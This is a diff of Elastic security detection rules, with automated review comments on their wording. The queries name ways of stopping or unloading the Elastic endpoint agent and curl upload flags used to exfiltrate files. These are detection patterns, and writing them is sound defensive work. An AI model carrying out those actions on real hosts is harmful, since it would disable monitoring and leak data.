@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Agent Service Terminated", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Elastic Agent Service Terminated\n\nThe Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. 
The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as \"net.exe\", \"sc.exe\", \"systemctl\", and \"pkill\" with arguments like \"stop\", \"uninstall\", or \"disable\".\n- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions.\n- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise.\n- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes.\n- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored.\n- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel.\n- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments.\n- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. 
Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions.\n- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools.\n- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries.\n- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, investigate potential causes such as corrupted files or missing dependencies.\n- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent.\n- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network.\n- Review and update endpoint security configurations to prevent unauthorized termination of security services. 
This may include implementing stricter access controls or using application whitelisting.\n- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway.\n- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary.", + "query": "process where event.type == \"start\" and\n(\n /* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n (\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\")\n ) or\n\n /* service or systemctl used to stop Elastic Agent on Linux */\n (\n process.name in (\"systemctl\", \"service\", \"chkconfig\", \"update-rc.d\") and\n process.args : (\"elastic-agent\", \"elastic-agent.service\", \"ElasticEndpoint\") and\n process.args : (\"stop\", \"disable\", \"remove\", \"off\", \"kill\", \"mask\") and\n not (\n process.parent.executable : \"/opt/Elastic/Agent/data/elastic-agent-*/components/previous/elastic-endpoint\" and\n process.parent.args : \"uninstall\" and\n process.parent.args : \"--keepstate\"\n )\n ) or\n \n /* pkill, killall used to stop Elastic Agent or Endpoint on Linux */\n (process.name in (\"pkill\", \"killall\", \"kill\") and process.args : (\"elastic-agent\", \"elastic-endpoint\")) or\n\n /* Unload Elastic Defend extension on MacOS */\n (process.name : \"kextunload\" and process.args : \"com.apple.iokit.EndpointSecurity\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "b627cd12-dac4-11ec-9582-f661ea17fbcd_113", + "type": "security-rule" +} \ No newline at end of file 
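Review bot: The description (`Identifies the Elastic endpoint agent has stopped and is no longer running on the host`) does not match what the query observes: it matches the start of a process that attempts to stop, disable, kill or uninstall the agent or endpoint, and nothing in the query checks whether the service actually stopped. Suggest opening the description with `Identifies attempts to stop, disable, kill or uninstall the Elastic Agent or Elastic Defend endpoint via service-control utilities, process-kill commands or kextunload.` and keeping the remaining sentences. Because the only index is `logs-endpoint.events.*`, telemetry for a successful termination comes from the component being shut down, so the guide's "Verify the current status" step should add that a missing follow-up event is expected and that agent health should be confirmed independently in Fleet. The EQL comment `/* net, sc or wmic stopping or deleting Elastic Agent on Windows */` no longer describes the list it heads, which also names powershell.exe, taskkill.exe, PsKill.exe and ProcessHacker.exe; reword it to `/* service-control and process-kill utilities stopping or removing Elastic Agent/Endpoint on Windows */` and normalise the mixed `","` / `", "` spacing in that list.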
diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json deleted file mode 100644 index 47b234701b3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5.json +++ /dev/null 
@@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Enrich process events with uname and other command lines that imply Linux system information discovery.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Linux System Information Discovery", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and (\n process.name: \"uname\" or (\n process.name: (\"cat\", \"more\", \"less\") and process.args: (\"*issue*\", \"*version*\", \"*profile*\", \"*services*\", \"*cpuinfo*\")\n )\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1082", - "name": "System Information Discovery", - "reference": "https://attack.mitre.org/techniques/T1082/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 5 - }, - "id": 
"b81bd314-db5b-4d97-82e8-88e3e5fc9de5_5", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json deleted file mode 100644 index 58127c5f168..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209.json +++ /dev/null 
@@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "OneDrive Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating OneDrive Malware File Upload\n\nOneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. 
This proactive approach helps in identifying and mitigating potential breaches.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities.\n- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware.\n- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file.\n- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file.\n- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users.\n- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise.\n- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware.\n\n### False positive analysis\n\n- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe.\n- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool.\n- Shared files from trusted partners or vendors could be mistakenly identified as threats. 
Establish a process to verify these files with the sender and use exceptions for recurring, verified files.\n- Archived or compressed files that contain known safe content might be flagged due to their format. Decompress and scan the contents separately to confirm their safety before adding exceptions.\n- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization.\n- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice.\n- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files.\n- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution.\n- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred.\n- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats.", - "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - 
"related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json deleted file mode 100644 index c0482d25c0d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_11.json +++ /dev/null 
@@ -1,121 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule defines a threshold-based approach to detect connection attempts from a single source to a large number of unique destination ports, while limiting the number of packets per port.", - "from": "now-9m", - "index": [ - "logs-network_traffic.*", - "packetbeat-*", - "filebeat-*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential SYN-Based Port Scan Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential SYN-Based Port Scan Detected\n\nSYN-based port scanning is a reconnaissance technique where attackers send SYN packets to multiple ports to identify open services. This method helps adversaries map network vulnerabilities for potential exploitation. 
The detection rule identifies such scans by flagging connection attempts from internal IPs to multiple ports with minimal packet exchange, indicating a low-risk reconnaissance activity.\n\n### Possible investigation steps\n\n- Review the source IP address involved in the alert to determine if it belongs to a known or authorized device within the network. Check for any recent changes or unusual activity associated with this IP.\n- Analyze the destination ports targeted by the scan to identify any patterns or specific services that may be of interest to the attacker. Determine if these ports are associated with critical or vulnerable services.\n- Examine historical logs to identify any previous scanning activity from the same source IP or similar patterns of behavior. This can help establish whether the activity is part of a larger reconnaissance effort.\n- Correlate the alert with other security events or alerts to assess if there is a broader attack campaign underway. Look for related alerts that might indicate subsequent exploitation attempts.\n- Investigate the timing and frequency of the scan attempts to understand if they coincide with other suspicious activities or known attack windows. This can provide context on the attacker's intent and urgency.\n- Assess the network's current security posture and ensure that appropriate defenses, such as firewalls and intrusion detection systems, are configured to mitigate potential exploitation of identified open ports.\n\n### False positive analysis\n\n- Internal network scanning tools or scripts used by IT teams for legitimate network mapping can trigger this rule. To manage this, create exceptions for known internal IP addresses or subnets used by IT for network discovery.\n- Automated monitoring systems or security appliances that perform regular port checks might be flagged. 
Identify these systems and exclude their IP addresses from the rule to prevent false positives.\n- Software updates or patch management systems that check multiple ports for service availability can be mistaken for a SYN-based port scan. Whitelist these systems to avoid unnecessary alerts.\n- Load balancers or network devices that perform health checks across multiple ports may trigger the rule. Exclude these devices from the rule to ensure accurate detection.\n- Development or testing environments where multiple port scans are part of routine operations can cause false positives. Implement exceptions for these environments to maintain focus on genuine threats.\n\n### Response and remediation\n\n- Isolate the affected internal IP address to prevent further reconnaissance or potential exploitation of identified open ports.\n- Conduct a thorough review of firewall and network access control lists to ensure that only necessary ports are open and accessible from internal networks.\n- Implement rate limiting on SYN packets to reduce the risk of successful port scanning and reconnaissance activities.\n- Monitor the network for any unusual outbound traffic from the affected IP address, which may indicate further malicious activity or data exfiltration attempts.\n- Escalate the incident to the security operations team for further analysis and to determine if additional network segments or systems are affected.\n- Update intrusion detection and prevention systems to enhance detection capabilities for similar SYN-based port scanning activities.\n- Review and update network segmentation policies to limit the exposure of critical services and systems to internal reconnaissance activities.", - "query": "event.action:network_flow and destination.port:* and network.packets <= 2 and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - 
} - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "network.packets", - "type": "long" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "bbaa96b9-f36c-4898-ace2-581acb00a409", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.port", - "value": 250 - } - ], - "field": [ - "destination.ip", - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 11 - }, - "id": "bbaa96b9-f36c-4898-ace2-581acb00a409_11", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json b/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json new file mode 100644 index 00000000000..94047daff7f 
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/be70614d-4295-473c-a953-582aef41c865_5.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Data Exfiltration Through Curl", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Data Exfiltration Through Curl\n\nCurl is a command-line tool used for transferring data with URLs, commonly employed for legitimate data exchange tasks. However, adversaries can exploit curl to exfiltrate sensitive data by uploading compressed files to remote servers. 
The detection rule identifies suspicious curl usage by monitoring for specific command patterns and arguments indicative of data uploads, flagging abnormal activities for further investigation.\n\n### Possible investigation steps\n\n- Review the process command line to confirm the presence of suspicious arguments such as \"-F\", \"-T\", \"-d\", or \"--data*\" and check for any compressed file extensions like .zip, .gz, or .tgz being uploaded to an external server.\n- Investigate the parent process of the curl command to understand the context in which curl was executed, including the parent executable and its purpose.\n- Examine network logs to identify the destination IP address or domain to which the data was being uploaded, and assess whether it is a known or suspicious entity.\n- Check for any recent file creation or modification events on the host that match the compressed file types mentioned in the query, which could indicate data collection prior to exfiltration.\n- Correlate this event with other security alerts or logs from the same host to identify any patterns of behavior that might suggest a broader compromise or data exfiltration attempt.\n\n### False positive analysis\n\n- Legitimate data transfers using curl for system backups or data synchronization can trigger the rule. To manage this, identify and whitelist specific processes or scripts that are known to perform these tasks regularly.\n- Automated system updates or software installations that use curl to download and upload data might be flagged. Exclude these processes by verifying their source and adding them to an exception list if they are from trusted vendors.\n- Internal data transfers within a secure network that use curl for efficiency can be mistaken for exfiltration. Monitor the destination IP addresses and exclude those that are internal or known safe endpoints.\n- Developers or system administrators using curl for testing or development purposes may inadvertently trigger the rule. 
Educate these users on the potential alerts and establish a process for them to notify security teams of their activities to prevent unnecessary investigations.\n- Scheduled tasks or cron jobs that use curl for routine data uploads should be reviewed and, if deemed safe, added to an exception list to avoid repeated false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further data exfiltration and contain the threat.\n- Terminate any suspicious curl processes identified by the detection rule to stop ongoing data transfers.\n- Conduct a forensic analysis of the affected system to identify any additional malicious activities or compromised data.\n- Change credentials and access keys that may have been exposed or used during the incident to prevent unauthorized access.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further action.\n- Review and update firewall and network security rules to block unauthorized outbound traffic, especially to suspicious or unknown external servers.\n- Implement enhanced monitoring and logging for curl usage and similar data transfer tools to detect and respond to future exfiltration attempts promptly.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"ProcessRollup2\", \"start\") and\nprocess.name == \"curl\" and ?process.parent.executable != null and\n(\n process.args in (\"-T\", \"--upload-file\") or\n (\n (process.args in (\"-F\", \"-d\", \"--form\") or process.args like \"--data*\") and process.command_line like \"*@*\"\n )\n) and\n(\n process.command_line like (\"*http:*\", \"*https:*\", \"*ftp:*\", \"*ftps:*\") or\n process.command_line regex \".*[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}.*\"\n)\n", + "references": [ + "https://everything.curl.dev/usingcurl/uploads", + 
"https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "be70614d-4295-473c-a953-582aef41c865", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "be70614d-4295-473c-a953-582aef41c865_5", + "type": "security-rule" +} \ No newline at end of file 
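Review bot: The investigation guide in `note` tells the analyst to check for compressed file extensions (.zip, .gz, .tgz) "mentioned in the query", but the `query` has no file-extension condition at all — it matches on `-T`/`--upload-file`, or `-F`/`-d`/`--form`/`--data*` together with an `@` in the command line, plus a URL scheme or a dotted-quad; the guide reads as if written for an earlier revision and should be aligned with the version-5 query, either by dropping the extension wording or by adding the extension check the guide assumes. The `note` value also begins with a stray space before `## Triage and analysis`, unlike the other rules in this change. The tag `Data Source: Crowdstrike` is spelled `Data Source: CrowdStrike` in c3f8a1d2-4b5e-4c6f-9a8b-1e2d3f4a5b6c_1.json in the same change; tags are plain string values, so the two spellings will not filter together. A lower-priority observation: the dotted-quad `regex` also matches version-like strings such as `1.2.3.4` anywhere in the command line, which the false-positive section does not mention.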
diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json deleted file mode 100644 index 7a78eba425a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_5.json +++ /dev/null 
@@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies the use of built-in tools which adversaries may use to enumerate the system owner/user of a compromised system.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "System Owner/User Discovery Linux", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and \nprocess.name : (\"whoami\", \"w\", \"who\", \"users\", \"id\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "bf8c007c-7dee-4842-8e9a-ee534c09d205", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1033", - "name": "System Owner/User Discovery", - "reference": "https://attack.mitre.org/techniques/T1033/" - }, - { - "id": "T1069", - "name": 